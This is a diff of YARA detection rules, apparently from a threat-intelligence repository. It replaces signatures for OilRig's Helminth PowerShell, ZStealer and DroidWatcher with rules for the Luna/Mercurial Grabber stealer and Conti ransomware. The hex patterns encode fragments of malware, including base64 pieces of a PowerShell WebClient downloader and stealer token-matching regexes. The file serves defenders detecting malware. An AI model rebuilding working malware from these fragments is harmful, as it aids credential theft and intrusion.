-		hash1 = "1edbb818ea75919bb70bd2496e789e89d26c94cdf65ab61ebb5f1403d45d323c"
-		hash2 = "1191d5c1dd7f6ac38b8d72bee37415b3ff1c28a8f907971443ac3a36906e8bf5"
+		hash1 = "c372c54b11465688201e2d48ffd5fd5b0ca49360858a70ce8413f5c9e24c8050"
+		hash2 = "441cb0576151b2e5b5127be72a5bcdf3577a596f0a4e1f2c6836248fe07eb818"
+		hash3 = "47b85abee8a07e79ad95f48a3e3addf7235144b67b0350e2f9ac80e66f97e583"
+		hash4 = "7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd"
+		adversary = "-"
 
 	strings:
-		$block1 = { 53 45 39 4e 52 54 30 69 4a 58 42 31 59 6d 78 70 59 79 56 63 54 47 6c 69 63 6d 46 79 61 57 56 7a 58 43 49 }
-		$block2 = { 43 6c 4e 46 55 6c 5a 46 55 6a 30 69 61 48 52 30 }
-		$block3 = { 56 34 4c 6d 46 7a 63 48 67 2f 63 6d 56 78 }
-		$block4 = { 6a 30 69 63 47 39 33 5a 58 4a 7a 61 47 56 73 62 43 41 69 49 69 5a 37 4a 48 64 6a 50 53 68 75 5a 58 63 74 62 32 4a 71 5a 57 4e 30 49 46 4e 35 63 33 52 6c 62 53 35 4f 5a 58 51 75 56 32 56 69 51 32 78 70 5a 57 35 30 4b 54 73 6b 64 32 4d 75 56 58 4e 6c 52 47 56 6d 59 58 56 73 64 45 4e 79 5a 57 52 6c 62 6e 52 70 59 57 78 7a 50 53 52 30 63 6e 56 6c 4f 79 52 33 59 79 35 49 5a 57 46 6b 5a 58 4a 7a 4c 6d 46 6b 5a 43 67 6e 51 57 4e 6a 5a 58 42 30 4a 79 77 6e 4b 69 38 71 4a 79 6b 37 4a 48 64 6a 4c 6b 68 6c 59 57 52 6c 63 6e 4d 75 59 57 52 6b 4b 43 64 56 63 32 56 79 4c 55 46 6e 5a 57 35 30 4a 79 77 6e 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 49 45 4a 4a 56 46 4d 76 4e 79 34 33 4a 79 6b 37 64 32 68 70 62 47 55 6f 4d 53 6c 37 64 48 4a 35 65 79 52 79 50 55 64 6c 64 43 31 53 59 57 35 6b 62 32 30 37 4a 48 64 6a 4c 6b 52 76 64 32 35 73 62 32 46 6b 52 6d 6c 73 }
-		$block5 = { 69 49 4e 43 6b 4e 79 5a 57 46 30 5a 55 39 69 61 6d 56 6a 64 43 67 69 56 31 4e 6a 63 6d 6c 77 64 43 35 54 61 47 56 73 62 43 49 70 4c 6c 4a 31 62 69 42 53 5a 58 42 73 59 57 [1-4] 45 52 33 62 69 77 69 4c 56 38 [1-4] 4a 6b 64 32 34 69 4b 53}
-		$block6 = { 30 69 49 69 49 4e 43 6b 4e 79 5a 57 46 30 5a 55 39 69 61 6d 56 6a 64 43 67 69 56 31 4e 6a 63 6d 6c 77 64 43 35 54 61 47 56 73 62 43 49 70 4c 6c 4a 31 62 69 42 53 5a 58 42 73 59 57 4e 6c 4b 45 52 76 64 32 35 73 62 32 46 6b 52 58 68 6c 59 33 56 30 5a 53 77 69 4c 56 38 69 4c 43 4a 69 59 58 51 }
-		$block7 = { 51 70 72 62 32 31 6a 50 53 4a 77 62 33 64 6c 63 6e 4e 6f 5a 57 78 73 49 43 31 6c 65 47 56 6a 49 45 4a 35 63 47 46 7a 63 79 41 74 52 6d 6c 73 5a 53 41 69 4a 6b }
-		$block8 = { 0a b7 9a b5 e3 9b 8d e7 2d 59 27 2b 8a 9b 52 85 e9 65 46 e9 [1-4] d4 }
+		$s1 = { 5c 00 70 00 69 00 70 00 65 00 5c 00 6c 00 73 00 61 00 72 00 70 00 63 }
+		$s2 = "ncacn_np" fullword wide
+		$s3 = { 5c 00 5c 00 25 00 73 00 5c 00 [1-20] 00 5c 00 [1-20] 00 }
+		$s4 = { 63 00 36 00 38 00 31 00 64 00 34 00 38 00 38 00 2d 00 64 00 38 00 35 00 30 00 2d 00 31 00 31 00 64 00 30 00 2d 00 38 00 63 00 35 00 32 00 2d 00 30 00 30 00 63 00 30 00 34 00 66 00 64 00 39 00 30 00 66 00 37 00 65 }
+		$s5 = { 00 72 48 02 00 70 28 0e 00 00 0a 73 15 00 00 0a 6f 16 00 00 0a 28 0a 00 00 0a 28 06 00 00 0a 00 38 4a 02 00 00 }
 
 	condition:
-		filesize < 2KB and 6 of them
+		uint16( 0 ) == 0x5a4d and filesize > 10KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Oilrig_PSH_Helminth_2016_1 : FILE
+rule ARKBIRD_SOLG_MAL_Luna_Stealer_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Detect Powershell script Helminth in base 64 used by OilRig (2016)"
+		description = "Detect Luna stealer (also Mercurial Grabber)"
 		author = "Arkbird_SOLG"
-		id = "782503c2-a292-505c-b513-79cbbd381124"
-		date = "2020-08-26"
-		modified = "2021-07-13"
-		reference = "https://twitter.com/Arkbird_SOLG/status/1298758788028264450"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-26/APT_OilRig_2016.yar#L25-L45"
+		id = "2fecce99-5869-5de0-afae-6dc245748fa6"
+		date = "2021-08-29"
+		modified = "2021-08-30"
+		reference = "https://github.com/NightfallGT/Mercurial-Grabber"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Luna/MAL_Luna_Stealer_Apr_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "0216015765f5abdb6ccf7643344aead51e4eebb19fd947f9484ce5dc6696d4d5"
+		logic_hash = "934ded815c262fa8bee38638e17ed8c2b1f0dcad28037bf1d525e11bf7e34dce"
 		score = 75
-		quality = 61
+		quality = 75
 		tags = "FILE"
-		hash1 = "1edbb818ea75919bb70bd2496e789e89d26c94cdf65ab61ebb5f1403d45d323c"
-		hash2 = "1191d5c1dd7f6ac38b8d72bee37415b3ff1c28a8f907971443ac3a36906e8bf5"
+		hash1 = "a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18"
+		hash2 = "93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f"
+		hash3 = "0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21"
+		hash4 = "ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a"
+		tlp = "White"
+		adversary = "-"
 
 	strings:
-		$block1 = { 70 74 65 57 6c 6b 49 44 30 67 4a 79 4d 6a 49 79 63 67 44 51 6f 67 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 68 76 62 57 55 67 50 53 41 69 4a 47 56 75 64 6a 70 51 64 }
-		$block2 = { 41 67 ?? ?? 42 6c 62 48 4e 6c 61 57 59 6f 4a 47 31 35 5a 6d 78 68 5a 7a 4d 67 4c 57 56 78 49 44 49 70 49 41 30 4b 49 43 41 67 49 48 73 67 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 67 6e 64 33 63 6e 4b 79 52 6e 62 47 39 69 59 57 77 36 62 58 6c 70 5a 43 73 6b 59 32 31 6b 61 57 51 72 4a 48 42 68 63 6e 52 70 5a 43 73 6f }
-		$block3 = { 6a 61 47 46 79 58 53 42 62 61 57 35 30 58 53 41 6b 64 47 31 77 57 7a 42 64 4b 53 41 72 49 43 }
-		$block4 = { 43 52 6a 62 6e 51 67 4c 57 56 78 49 44 49 31 4b 53 6b 67 44 51 6f 67 49 43 41 67 65 79 41 }
-		$block5 = { 5a 6c 52 45 35 54 49 43 67 6b 5a 43 6b 67 44 51 70 37 49 41 30 4b 43 53 52 6a 62 6e 51 67 50 53 41 77 49 41 30 4b 43 58 64 6f 61 57 78 6c 49 43 67 6b 59 32 35 30 49 43 31 73 64 43 41 79 4d 43 6b 67 44 51 6f 4a 65 79 41 4e 43 67 6b 4a 64 48 4a 35 49 41 30 4b 43 51 6c 37 }
-		$block6 = { 4b 49 43 41 67 49 43 41 67 49 43 41 6b 61 53 73 72 49 41 30 4b 49 43 41 67 49 48 30 67 44 51 6f 67 49 43 41 67 61 57 59 6f 4a 48 4a 6c 64 43 41 74 5a 58 45 67 4d 53 6b 67 44 51 6f 67 49 43 41 }
-		$block7 = { 77 36 62 58 6c 6d 62 47 46 6e 49 44 30 67 4d 43 41 4e 43 69 41 67 49 43 42 39 49 41 30 4b 49 43 41 67 49 47 56 73 63 32 56 70 5a 69 41 6f 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 5a 73 59 57 63 67 4c 57 56 78 49 44 45 70 49 41 30 4b 49 43 41 67 49 48 73 67 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 52 30 62 58 41 67 50 53 41 6b 62 58 6c 6b 59 58 52 68 4c 6c 4e 77 62 47 6c 30 4b 43 63 75 4a 79 6b 67 44 51 6f 67 49 43 41 67 49 43 41 67 49 46 74 54 65 58 4e 30 5a 57 30 75 53 55 38 75 52 6d 6c 73 5a 56 30 36 4f 6b 46 77 63 47 56 75 5a 45 46 73 62 46 52 6c 65 48 51 6f 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 68 76 62 57 55 72 4a 33 52 77 58 43 63 72 4a 47 64 73 62 32 4a 68 62 44 70 6d 61 57 78 6c 62 6d 46 74 }
-		$block8 = { 4a 47 6b 72 4b 79 41 4e 43 69 41 67 49 43 42 39 49 41 30 4b 49 48 30 67 44 51 6f 67 44 51 6f 67 5a 6e 56 75 59 33 52 70 62 32 34 67 52 32 56 30 53 55 [1-10] 4e 43 69 41 67 49 43 41 6b 5a 32 78 76 59 6d 46 73 4f 6d 31 35 61 57 51 67 50 53 42 54 5a 57 35 6b 55 6d 56 6a 5a 57 6c 32 5a 55 52 4f 55 79 41 6f 4b 45 64 6c 64 46 4e 31 59 69 41 77 4b 53 73 6e 4d 7a 41 6e 4b 53 41 4e 43 69 42 39 49 41 30 4b 49 41 30 4b 49 47 5a 31 62 6d 4e 30 61 57 39 [1-10] 56 52 6f 61 58 4e 47}
-		$block9 = { 73 67 44 51 6f 4a 43 57 31 6b 49 43 31 47 62 33 4a 6a 5a 53 41 6f 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 68 76 62 57 55 72 4a 33 52 77 58 43 63 70 49 41 30 4b 43 51 6c 48 5a 58 52 4a 52 43 41 4e 43 67 6b 4a 51 32 68 68 62 6d 64 6c 56 47 68 70 63 30 5a 70 62 47 55 67 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 6c 6b 49 41 30 4b 49 43 41 67 49 48 30 67 44 51 6f 67 66 53 41 4e 43 69 42 6d 64 57 35 6a 64 47 6c 76 62 69 42 74 59 57 6c 75 49 41 30 4b }
+		$s1 = { 73 ?? 00 00 0a 0b 07 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 0a 6f ?? 00 00 0a 0c 08 6f ?? 00 00 0a 6f ?? 00 00 0a 6f ?? 00 00 0a 0d 09 6f ?? 00 00 0a 0a 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 06 28 ?? 00 00 0a de 0a 07 2c 06 07 6f ?? 00 00 0a dc de 1a 13 04 72 [2] 00 70 11 04 6f ?? 00 00 0a 28 ?? 00 00 0a 28 ?? 00 00 0a de 00 2a }
+		$s2 = { 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 0a 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 0b 02 06 72 [2] 00 70 07 28 ?? 00 00 0a 7d ?? 00 00 04 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 0c 02 72 [2] 00 70 02 7b ?? 00 00 04 72 [2] 00 70 08 28 ?? 00 00 0a 7d ?? 00 00 04 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 02 7b ?? 00 00 04 28 ?? 00 00 0a 1f 16 63 21 00 b0 ca a2 4a 01 00 00 58 0d 09 28 ?? 00 00 0a 13 05 12 05 28 ?? 00 00 0a 13 04 02 12 04 fe 16 ?? 00 00 01 6f ?? 00 00 0a 7d ?? 00 00 04 2a }
+		$s3 = { 72 [2] 00 70 73 ?? 00 00 0a 0a 06 6f ?? 00 00 0a 6f ?? 00 00 0a 0c 2b 75 08 6f ?? 00 00 0a 74 ?? 00 00 01 0b 07 72 [2] 00 70 6f ?? 00 00 0a 2c 16 02 07 72 [2] 00 70 6f ?? 00 00 0a 6f ?? 00 00 0a 7d ?? 00 00 04 07 72 [2] 00 70 6f ?? 00 00 0a 2c 16 02 07 72 [2] 00 70 6f ?? 00 00 0a 6f ?? 00 00 0a 7d ?? 00 00 04 07 72 ?? 19 00 70 6f ?? 00 00 0a 2c 16 02 07 72 ?? 19 00 70 6f ?? 00 00 0a 6f ?? 00 00 0a 7d ?? 00 00 04 08 6f ?? 00 00 0a 2d 83 de 0a 08 2c 06 08 6f ?? 00 00 0a dc 2a }
+		$x1 = "---------------- mercurial grabber ----------------" fullword wide
+		$x2 = { 5c 00 73 00 2a 00 3a 00 5c 00 73 00 2a 00 28 00 22 00 28 00 3f 00 3a 00 5c 00 5c 00 22 00 7c 00 5b 00 5e 00 22 00 5d 00 29 00 2a 00 3f }
+		$x3 = { 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 32 00 34 00 7d 00 5c 00 2e 00 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 36 00 7d 00 5c 00 2e 00 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 32 00 37 00 7d 00 01 1d 6d 00 66 00 61 00 5c 00 2e 00 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 38 00 34 00 7d }
 
 	condition:
-		filesize < 3KB and 7 of them
+		uint16( 0 ) == 0x5a4d and filesize > 20KB and 2 of ( $x* ) and 2 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Zstealer_Nov_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Conti_May_2021_2 : FILE
 {
 	meta:
-		description = "Detect ZStealer stealer used by Void Balaur group"
+		description = "Detect unpacked Conti ransomware (May 2021)"
 		author = "Arkbird_SOLG"
-		id = "0282884b-569a-5e46-a6ad-d2776ff71ddb"
-		date = "2021-11-11"
-		modified = "2021-11-12"
-		reference = "https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-11/Void_Balaur/MAL_ZStealer_Nov_2021_1.yara#L1-L19"
+		id = "f7580a0d-b94e-560e-a01e-1f0eb0c8833e"
+		date = "2021-05-20"
+		modified = "2021-05-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-20/Conti/RAN_Conti_May_2021_2.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "c3bec4fb8338ad71577e63f81c22b5d250083f2475f60610de8dccd4979035d3"
+		logic_hash = "d1ec1d2954d0075d9d9ed194bb96a34d457045bfc7a22cb44adb76dee4bc8e41"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "af89d85a3b579ac754850bd6e52e7516c2e63141107001463486cd01bc175052"
-		hash2 = "5a2c9060f6cc1e6e0fd09b2b194631d2c7e7f024d9e2d3a9be64570e263f565f"
-		tlp = "white"
-		adversary = "Void Balaur"
+		hash1 = "Redacted"
+		hash2 = "a5751a46768149c5ddf318fd75afc66b3db28a5b76254ee0d6ae27b21712e266"
+		hash3 = "74b7a1da50ce44b640d84422bb3f99e2f338cc5d5be9ef5f1ad03c8e947296c3"
+		hash4 = "ef2cd9ded5532af231e0990feaf2df8fd79dc63f7a677192e17b89ef4adb7dd2"
 
 	strings:
-		$s1 = { 53 33 c0 55 68 71 d3 46 00 64 ff 30 64 89 20 a1 80 7f 7b 00 8b 10 ff 52 44 a1 84 7f 7b 00 8b 10 ff 52 44 8d 45 fc 50 68 80 d3 46 00 68 02 00 00 80 e8 e3 a3 f9 ff 85 c0 0f 85 94 01 00 00 8d 45 f8 ba 00 10 00 00 e8 86 83 f9 ff c7 45 f0 00 10 00 00 33 db e9 49 01 00 00 8d 45 f4 50 6a 00 8d 45 f8 e8 36 82 f9 ff 8d 55 e8 e8 e6 cd f9 ff 8b 4d e8 8d 45 ec ba bc d3 46 00 e8 12 80 f9 ff 8b 55 ec b9 fc d3 46 00 b8 02 00 00 80 e8 d4 d8 ff ff 84 c0 0f 84 01 01 00 00 8d 55 e4 8b 45 f4 e8 c5 c0 f9 ff 8b 55 e4 8d 45 f4 e8 6e 7d f9 ff 8b 55 f4 b8 14 d4 46 00 e8 cd 82 f9 ff 85 c0 7e 32 8d 45 e0 50 8b 55 f4 b8 14 d4 46 00 e8 b8 82 f9 ff 8b c8 83 c1 03 ba 01 00 00 00 8b 45 f4 e8 c2 81 f9 ff 8b 55 e0 a1 80 7f 7b 00 8b 08 ff 51 38 eb 0d 8b 55 f4 a1 80 7f 7b 00 8b 08 ff 51 38 8d 45 f4 50 6a 00 8d 45 f8 e8 90 81 f9 ff 8d 55 d8 e8 40 cd f9 ff 8b 4d d8 8d 45 dc ba bc d3 46 00 e8 6c 7f f9 ff 8b 55 dc b9 24 d4 46 00 b8 02 00 00 80 e8 2e d8 ff ff 84 c0 74 42 8d 45 f8 }
-		$s2 = { 8b d9 88 55 fb 89 45 fc 33 c0 55 68 b3 2e 46 00 64 ff 30 64 89 20 33 d2 8b 45 fc e8 a0 11 fa ff b2 01 a1 2c 74 41 00 e8 94 11 fa ff 8b 55 fc 89 42 0c 8b 45 fc c6 40 08 00 33 c0 89 45 f4 33 d2 55 68 96 2e 46 00 64 ff 32 64 89 22 8d 45 f0 89 5d ec 8b 55 ec e8 9e 21 fa ff 8b 45 fc 83 c0 04 50 8b 45 f0 e8 b7 25 fa ff 50 e8 2d f5 ff ff 83 c4 08 85 c0 74 66 8b 45 fc 8b 40 04 85 c0 74 39 50 e8 26 f5 ff ff 59 89 45 f4 89 5d dc c6 45 e0 0b 8b 45 f4 89 45 e4 c6 45 e8 06 8d 45 dc 50 6a 01 b9 e4 2e 46 00 b2 01 a1 58 2c 46 00 e8 be a1 fa ff e8 9d 19 fa ff eb 23 89 5d d4 c6 45 d8 0b 8d 45 d4 50 6a 00 b9 10 2f 46 00 b2 01 a1 58 2c 46 00 e8 99 a1 fa ff e8 78 19 fa ff 33 c0 5a 59 59 64 89 10 68 9d 2e 46 00 83 7d f4 00 74 0a 8b 45 f4 50 e8 c4 f4 ff ff }
-		$s3 = { 68 1d c7 45 00 64 ff 30 64 89 20 8b c3 e8 d8 89 fa ff 8d 45 fc ba 00 01 00 00 e8 17 90 fa ff c7 45 f8 ff 00 00 00 8d 45 f8 50 8d 45 fc e8 d0 8e fa ff 50 e8 f6 af fa ff c7 45 f4 ff 00 00 00 c7 45 f0 ff 00 00 00 8d 45 ec 50 8d 45 f0 50 8d 85 ec fd ff ff 50 8d 45 f4 50 8d 85 ec fe ff ff 50 8d 45 fc e8 9a 8e fa ff 50 6a 00 e8 d6 af fa ff 85 c0 0f 84 6d 01 00 00 8d 85 ec fe ff ff 50 e8 ba af fa ff 85 c0 0f 84 59 01 00 00 8d 85 ec fe ff ff 50 e8 7e af fa ff 8b f0 8d 85 ec fe ff ff 50 e8 80 af fa ff 0f b6 38 8b c3 ba 34 c7 45 00 e8 89 89 fa ff 80 3e 00 75 }
-		$s4 = { a1 9c c2 49 00 8b 00 e8 e3 82 01 00 8b 93 88 01 00 00 8b 08 ff 51 54 8b f8 85 ff 7c 15 a1 9c c2 49 00 8b 00 e8 c6 82 01 00 8b d7 8b 08 ff 51 18 8b f0 6a 01 56 e8 e1 f2 fc ff 8b c3 e8 be 17 00 00 8a 93 84 01 00 00 e8 2f 61 00 00 33 c0 5a 59 59 }
-		$s5 = { 45 72 72 6f 72 20 5b 25 64 5d 3a 20 25 73 2e 0d 22 25 73 22 3a 20 25 73 00 00 ff ff ff ff 0a 00 00 00 4e 6f 20 6d 65 73 73 61 67 65 }
+		$seq1 = { 33 db 3c 2f 74 0a 3c 5c 74 06 3c 3a 8a c3 75 02 b0 01 2b cf 0f b6 c0 41 89 9d 68 fd ff ff f7 d8 89 9d 6c fd ff ff 56 1b c0 89 9d 70 fd ff ff 23 c1 89 9d 74 fd ff ff 89 85 88 fd ff ff 89 9d 78 fd ff ff 88 9d 7c fd ff ff e8 [4] 50 8d 85 68 fd ff ff 50 57 e8 68 fc ff ff 83 c4 0c 8d 8d ac fd ff ff f7 d8 1b c0 53 53 53 51 f7 d0 23 85 70 fd ff ff 53 50 ff 15 [4] 8b f0 83 fe ff 75 18 ff b5 a4 fd ff ff 53 53 57 e8 42 fe ff ff 83 c4 10 8b d8 e9 1c 01 00 00 8b 85 a4 fd ff ff 8b 48 04 2b 08 c1 f9 02 89 8d 84 fd ff ff 89 9d 8c fd ff ff 89 9d 90 fd ff ff 89 9d 94 fd ff ff 89 9d 98 fd ff ff 89 9d 9c fd ff ff 88 9d a0 fd ff ff e8 [4] 50 8d 85 ab fd ff ff 50 8d 85 8c fd ff ff 50 8d 85 d8 fd ff ff 50 e8 01 fb ff ff 83 c4 10 f7 d8 1b c0 f7 d0 23 85 94 fd ff ff 80 }
+		$seq2 = { 38 9d a0 fd ff ff 74 0c ff b5 94 fd ff ff e8 [2] ff ff 59 8d 85 ac fd ff ff 50 56 ff 15 [4] 85 c0 0f 85 4d ff ff ff 8b 85 a4 fd ff ff 8b 8d 84 fd ff ff 8b 10 8b 40 04 2b c2 c1 f8 02 3b c8 74 34 68 [4] 2b c1 6a 04 50 8d 04 8a 50 e8 [2] 00 00 83 c4 10 eb 1c 38 9d a0 fd ff ff 74 12 ff b5 94 fd ff ff e8 [2] ff ff 8b 85 80 fd ff ff 59 8b d8 56 ff 15 [4] 80 bd 7c fd ff ff 00 5e 74 0c ff b5 70 fd ff ff e8 [2] ff ff 59 8b }
+		$seq3 = { 6a 0c 68 [4] e8 [2] ff ff 33 f6 89 75 e4 8b 45 08 ff 30 e8 [2] ff ff 59 89 75 fc 8b 45 0c 8b 00 8b 38 8b d7 c1 fa 06 8b c7 83 e0 3f 6b c8 38 8b 04 95 [4] f6 44 08 28 01 74 21 57 e8 [2] ff ff 59 50 ff 15 [4] 85 c0 75 1d e8 [2] ff ff 8b f0 ff 15 [4] 89 06 e8 [2] ff ff c7 00 09 00 00 00 83 ce ff 89 75 e4 c7 45 fc fe ff ff ff e8 0d 00 00 00 8b c6 e8 [2] ff }
+		$seq4 = { 8b ff 55 8b ec 56 6a 00 ff 75 10 ff 75 0c ff 75 08 ff 35 [4] ff 15 [4] 8b f0 85 f6 75 2d ff 15 [4] 83 f8 06 75 22 e8 b6 ff ff ff e8 73 ff ff ff 56 ff 75 10 ff 75 0c ff 75 08 ff 35 [4] ff 15 [4] 8b f0 8b c6 5e }
+		$seq5 = { 55 8b ec 81 ec b4 09 00 00 a1 08 [3] 33 c5 89 45 fc 53 56 57 6a ?? 68 [4] ba 18 00 00 00 33 c9 e8 [2] ff ff 83 c4 08 6a 00 6a 00 ff d0 8b f0 85 f6 0f 88 9a 03 00 00 c7 85 8c f7 ff ff [3] 00 bb 03 00 00 00 8b 85 8c f7 ff ff 99 f7 fb 8b 85 8c f7 ff ff 8d 7b 02 85 d2 74 57 83 c0 02 03 c6 89 85 8c f7 ff ff 8b 85 8c f7 ff ff 25 03 00 00 80 79 07 48 83 c8 fc 83 c0 01 0f 85 64 01 00 00 66 66 0f 1f 84 00 00 00 00 00 8b 85 8c f7 ff ff 40 89 85 8c f7 ff ff 8b 85 8c f7 ff ff 25 03 00 00 80 79 07 48 83 c8 fc 83 c0 01 74 dd e9 32 01 00 00 25 01 00 00 80 79 07 48 83 c8 fe 83 c0 01 74 47 b8 02 00 00 00 2b }
+		$seq6 = { 83 3b 00 c7 45 94 00 00 00 00 0f 86 57 02 00 00 8b 35 b4 21 41 00 8d 4b 14 8b 3d c8 21 41 00 8b 1d 9c 21 41 00 89 4d 90 c7 45 98 7f 00 00 00 89 b5 7c ff ff ff 89 bd 78 ff ff ff 89 5d 9c 0f 1f 40 00 8b 11 8d 45 d0 89 55 cc b9 2c 00 00 00 0f 1f 00 c6 00 00 8d 40 01 83 e9 01 75 f5 52 ff d6 8b f0 ff d7 c6 45 b4 00 bf 7f 00 00 00 c6 45 b5 42 c6 45 b6 31 c6 45 b7 2a c6 45 b8 0b c6 45 b9 63 8a 4d b5 80 7d b4 00 75 28 33 c9 66 0f 1f 44 00 00 8a 44 0d b5 0f b6 c0 83 e8 63 6b c0 25 99 f7 ff 8d 42 7f 99 f7 ff 88 54 0d b5 41 83 f9 05 72 e0 8d 45 b5 50 56 ff d3 c6 45 a0 00 c6 45 a1 51 c6 45 a2 1f c6 45 a3 2b c6 45 a4 44 c6 45 a5 51 c6 45 a6 12 c6 45 a7 45 c6 45 a8 44 c6 45 a9 26 89 45 84 8a 45 a1 80 7d a0 00 75 27 33 c9 0f 1f 00 8a 44 0d a1 0f b6 c0 83 e8 26 8d 04 80 03 c0 99 f7 ff 8d 42 7f 99 f7 ff 88 54 0d a1 41 83 f9 09 72 de 8d 45 a1 50 56 ff d3 c6 45 bc 00 8b d8 c6 45 bd 42 c6 45 be 19 c6 45 bf 46 c6 45 c0 59 8a 4d bd 80 7d bc 00 89 5d 88 75 2c 33 ff 8d 5f 7f 8a 44 3d bd 0f b6 c8 83 e9 59 8b c1 c1 e0 05 2b c1 99 f7 fb 8d 42 7f 99 f7 fb 88 54 3d bd 47 83 ff 04 72 dc 8b 5d 88 8d 45 bd 50 56 ff 55 9c c6 45 ac 00 8b f8 c6 45 ad 76 c6 45 ae 30 c6 45 af 06 c6 45 b0 21 c6 45 b1 2a 8a 4d ad 80 7d ac 00 75 24 33 c9 8a 44 0d ad 0f b6 c0 83 e8 2a 8d 04 c0 99 f7 7d 98 8d 42 7f 99 f7 7d 98 88 54 0d ad 41 83 f9 05 72 de 8d 45 ad 50 56 ff 55 9c }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 300KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize > 50KB and 5 of ( $seq* )
 }
-rule ARKBIRD_SOLG_APK_Droidwatcher_Nov_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Conti_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect modified DroidWatcher stealer used by Void Balaur group"
+		description = "Detect packed Conti ransomware (May 2021) [Common parts with Vidar packer, possible false positives to Vidar stealer or Danabot"
 		author = "Arkbird_SOLG"
-		id = "04e02521-d89a-5f72-8b6f-0350f6defdd0"
-		date = "2021-11-11"
-		modified = "2021-11-12"
-		reference = "https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-11/Void_Balaur/APK_DroidWatcher_Nov_2021_1.yara#L1-L19"
+		id = "661182f7-4716-50d1-8d98-9fb272cf43eb"
+		date = "2021-05-19"
+		modified = "2021-05-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-20/Conti/RAN_Conti_May_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "c16bcdd5d9cd6a3cbb527893e13ac967211d1686edd9f7ae03e37feada725a1b"
+		logic_hash = "397f99dee35d8a0c5f564655e952f8a55d347a74303eadfc6788bd6ff0f6c4c5"
 		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "902c5f46ac101b6f30032d4c5c86ecec115add3605fb0d66057130b6e11c57e6"
-		tlp = "white"
+		hash1 = "Redacted"
+		tlp = "White"
+		adversary = "RAAS"
 		level = "Experimental"
-		adversary = "Void Balaur"
 
 	strings:
-		$s1 = { 38 50 F4 59 CC FF F3 37 65 28 4F 35 1A D2 83 C9 6C E0 20 27 38 C5 39 2E 72 95 5B 3C E0 29 D1 9E C7 0C A4 21 1B 55 09 A5 0B 83 99 C8 7C D6 F2 0F 47 B9 CE 43 82 5E C4 0C }
-		$s2 = { 3C E2 39 81 D4 EA 82 1F F8 83 42 54 A0 2E 6D E8 C5 44 E6 B0 92 13 5C E6 21 EF 89 9D 26 28 90 8C 3C 94 A3 36 AD E9 CD 48 26 B2 92 1D 1C E4 34 57 B9 C7 2B A2 7D 1E 14 A8 4A 4D 5A D3 8E 2E F4 A4 1F 83 19 C1 58 A6 32 9B 05 2C 63 03 DB B9 42 }
